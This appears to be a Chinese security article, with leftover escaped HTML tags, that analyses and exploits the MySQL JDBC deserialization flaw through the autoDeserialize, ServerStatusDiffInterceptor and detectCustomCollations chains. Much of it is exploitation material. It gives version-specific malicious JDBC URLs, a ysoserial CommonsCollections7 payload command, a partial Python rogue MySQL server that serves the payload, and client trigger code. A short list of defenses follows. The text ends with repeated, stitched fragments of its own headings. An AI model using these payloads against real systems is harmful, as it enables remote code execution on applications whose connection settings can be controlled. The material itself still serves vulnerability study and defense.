MySQL-JDBC反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2>
MySQL-JDBC反序列化漏洞是指当攻击者能够控制JDBC连接设置项时，可以通过设置指向恶意MySQL服务器进行`ObjectInputStream.readObject()<\/code>的反序列化攻击从而实现远程代码执行(RCE)。<\/p>`

漏洞前提条件<\/h3>

JDBC连接参数可控且目标机器能够出网<\/li>
存在可利用的反序列化漏洞链<\/li>
<\/ol>
漏洞原理<\/h2>
MySQL JDBC客户端在连接服务端时，如果字段类型为BLOB或BIT且autoDeserialize<\/code>设置为true，会对数据进行反序列化操作。攻击者可以通过控制连接参数，使客户端连接恶意MySQL服务器，返回精心构造的序列化数据触发反序列化漏洞。<\/p>
漏洞分析<\/h2>
两条主要触发链<\/h3>

SHOW SESSION STATUS<\/strong>链<\/li>
SHOW COLLATION<\/strong>链<\/li>
<\/ol>
关键参数说明<\/h3>

BLOB<\/strong>: 二进制形式的长文本数据<\/li>
BIT<\/strong>: Bit数据类型<\/li>
queryInterceptors<\/strong>: 逗号分隔的Class列表(实现com.mysql.cj.interceptors.QueryInterceptor<\/code>接口)，在Query执行前后进行拦截操作<\/li>
autoDeserialize<\/strong>: 自动检测与反序列化BLOB字段中的对象<\/li>
<\/ul>
ServerStatusDiffInterceptor触发链分析<\/h3>
依赖版本<\/h4>

mysql-connector-java 8.0.13<\/li>
<\/ul>
漏洞触发点<\/h4>

反序列化入口在com.mysql.cj.jdbc.result.ResultSetImpl.getObject()<\/code><\/li>
当字段类型为BIT或BLOB且autoDeserialize=true<\/code>时，会检查数据是否为Java序列化对象<\/li>
如果是序列化对象，则调用readObject()<\/code>进行反序列化<\/li>
<\/ol>
调用链<\/h4>
ServerStatusDiffInterceptor.preProcess()
→ populateMapWithSessionStatusValues()
→ resultSetToMap()
→ getObject()
→ readObject()
<\/code><\/pre>
关键代码分析<\/h4>
public<\/span> Object getObject<\/span>(<\/span>int<\/span> columnIndex)<\/span> throws<\/span> SQLException {<\/span>
<\/span><\/span>    \/\/ 检查字段类型
<\/span><\/span><\/span><\/span>    switch<\/span> (<\/span>field.<\/span>getMysqlType<\/span>())<\/span> {<\/span>
<\/span><\/span>        case<\/span> BIT:<\/span>
<\/span><\/span>        case<\/span> BLOB:<\/span>
<\/span><\/span>            if<\/span> ((<\/span>Boolean)<\/span>this<\/span>.<\/span>connection<\/span>.<\/span>getPropertySet<\/span>().<\/span>getBooleanProperty<\/span>(<\/span>PropertyKey.<\/span>autoDeserialize<\/span>).<\/span>getValue<\/span>())<\/span> {<\/span>
<\/span><\/span>                \/\/ 检查是否为Java序列化对象(魔数0xaced)
<\/span><\/span><\/span><\/span>                if<\/span> (<\/span>data[<\/span>0<\/span>]<\/span> !=<\/span> -<\/span>84<\/span> ||<\/span> data[<\/span>1<\/span>]<\/span> !=<\/span> -<\/span>19<\/span>)<\/span> {<\/span>
<\/span><\/span>                    return<\/span> this<\/span>.<\/span>getString<\/span>(<\/span>columnIndex);<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>                \/\/ 反序列化
<\/span><\/span><\/span><\/span>                ByteArrayInputStream bytesIn =<\/span> new<\/span> ByteArrayInputStream(<\/span>data);<\/span>
<\/span><\/span>                ObjectInputStream objIn =<\/span> new<\/span> ObjectInputStream(<\/span>bytesIn);<\/span>
<\/span><\/span>                obj =<\/span> objIn.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>detectCustomCollations触发链分析<\/h3>
依赖版本<\/h4>

mysql-connector-java 5.1.29<\/li>
<\/ul>
触发条件<\/h4>

服务器版本≥4.1.0<\/li>
detectCustomCollations=true<\/code><\/li>
<\/ul>
调用链<\/h4>
ConnectionImpl.buildCollationMapping()
→ 执行SHOW COLLATION
→ resultSetToMap()
→ getObject()
→ readObject()
<\/code><\/pre>
漏洞利用Payload<\/h2>
ServerStatusDiffInterceptor链<\/h3>


MySQL 8.x<\/strong>:<\/p>
jdbc:mysql:\/\/127.0.0.1:3306\/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
<\/code><\/pre>
<\/li>

MySQL 6.x<\/strong>(属性名不同):<\/p>
jdbc:mysql:\/\/127.0.0.1:3306\/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
<\/code><\/pre>
<\/li>

MySQL 5.1.11及以上<\/strong>:<\/p>
jdbc:mysql:\/\/127.0.0.1:3306\/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
<\/code><\/pre>
<\/li>
<\/ol>
detectCustomCollations链<\/h3>


MySQL 5.1.29-5.1.40<\/strong>:<\/p>
jdbc:mysql:\/\/127.0.0.1:3306\/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc
<\/code><\/pre>
<\/li>

MySQL 5.1.28-5.1.19<\/strong>:<\/p>
jdbc:mysql:\/\/127.0.0.1:3306\/test?autoDeserialize=true&user=yso_JRE8u20_calc
<\/code><\/pre>
<\/li>
<\/ol>
漏洞复现<\/h2>
准备工作<\/h3>

使用MySQL_Fake_Server<\/a>搭建恶意MySQL服务器<\/li>
生成ysoserial payload:
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 calc > payload
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
恶意MySQL服务器代码示例<\/h3>
# coding=utf-8<\/span>
<\/span><\/span>import<\/span> socket
<\/span><\/span>import<\/span> binascii
<\/span><\/span>import<\/span> os
<\/span><\/span>
<\/span><\/span>greeting_data=<\/span>"4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"<\/span>
<\/span><\/span>response_ok_data=<\/span>"0700000200000002000000"<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> get_payload_content<\/span>():
<\/span><\/span>    file=<\/span> r<\/span>'payload'<\/span>
<\/span><\/span>    if<\/span> os.<\/span>path.<\/span>isfile(file):
<\/span><\/span>        with<\/span> open(file, 'rb'<\/span>) as<\/span> f:
<\/span><\/span>            return<\/span> str(binascii.<\/span>b2a_hex(f.<\/span>read()),encoding=<\/span>'utf-8'<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> run<\/span>():
<\/span><\/span>    sk =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>    sk.<\/span>setsockopt(socket.<\/span>SOL_SOCKET, socket.<\/span>SO_REUSEADDR, 1<\/span>)
<\/span><\/span>    sk.<\/span>bind(('0.0.0.0'<\/span>, 3307<\/span>))
<\/span><\/span>    sk.<\/span>listen(1<\/span>)
<\/span><\/span>
<\/span><\/span>    while<\/span> 1<\/span>:
<\/span><\/span>        conn, addr =<\/span> sk.<\/span>accept()
<\/span><\/span>        # 发送问候报文<\/span>
<\/span><\/span>        send_data(conn,greeting_data)
<\/span><\/span>        
<\/span><\/span>        while<\/span> True<\/span>:
<\/span><\/span>            # 处理认证过程<\/span>
<\/span><\/span>            receive_data(conn)
<\/span><\/span>            send_data(conn,response_ok_data)
<\/span><\/span>            
<\/span><\/span>            data=<\/span>receive_data(conn)
<\/span><\/span>            if<\/span> "show session status"<\/span> in<\/span> data:
<\/span><\/span>                # 构造包含payload的响应<\/span>
<\/span><\/span>                payload_content=<\/span>get_payload_content()
<\/span><\/span>                # ... [构造响应数据包] ...<\/span>
<\/span><\/span>                send_data(conn, mysql_data)
<\/span><\/span>            break<\/span>
<\/span><\/span><\/code><\/pre>客户端测试代码<\/h3>
import<\/span> java.sql.*;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Test<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Class.<\/span>forName<\/span>(<\/span>"com.mysql.jdbc.Driver"<\/span>);<\/span>
<\/span><\/span>        String jdbc_url =<\/span> "jdbc:mysql:\/\/127.0.0.1:3307\/test?"<\/span> +<\/span>
<\/span><\/span>                "autoDeserialize=true"<\/span> +<\/span>
<\/span><\/span>                "&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"<\/span>;<\/span>
<\/span><\/span>        Connection con =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>jdbc_url,<\/span> "root"<\/span>,<\/span> "root"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

升级MySQL Connector\/J到最新版本<\/li>
禁止用户控制JDBC连接参数<\/li>
设置autoDeserialize=false<\/code><\/li>
使用白名单限制允许连接的MySQL服务器<\/li>
<\/ol>
参考链接<\/h2>

https:\/\/xz.aliyun.com\/t\/8159<\/li>
https:\/\/www.mi1k7ea.com\/2021\/04\/23\/MySQL-JDBC反序列化漏洞\/<\/li>
https:\/\/www.anquanke.com\/post\/id\/203086<\/li>
<\/ol>

MySQL-JDBC反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2> MySQL-JDBC反序列化漏洞是指当攻击者能够控制JDBC连接设置项时，可以通过设置指向恶意MySQL服务器进行ObjectInputStream.readObject()<\/code>的反序列化攻击从而实现远程代码执行(RCE)。<\/p>

ServerStatusDiffInterceptor触发链分析<\/h3>

detectCustomCollations触发链分析<\/h3>

漏洞利用Payload<\/h2>

漏洞复现<\/h2>

参考链接<\/h2> https:\/\/xz.aliyun.com\/t\/8159<\/li> https:\/\/www.mi1k7ea.com\/2021\/04\/23\/MySQL-JDBC反序列化漏洞\/<\/li> https:\/\/www.anquanke.com\/post\/id\/203086<\/li> <\/ol>

漏洞概述<\/h2>
MySQL-JDBC反序列化漏洞是指当攻击者能够控制JDBC连接设置项时，可以通过设置指向恶意MySQL服务器进行`ObjectInputStream.readObject()<\/code>的反序列化攻击从而实现远程代码执行(RCE)。<\/p>`

参考链接<\/h2>

https:\/\/xz.aliyun.com\/t\/8159<\/li>
https:\/\/www.mi1k7ea.com\/2021\/04\/23\/MySQL-JDBC反序列化漏洞\/<\/li>
https:\/\/www.anquanke.com\/post\/id\/203086<\/li> <\/ol>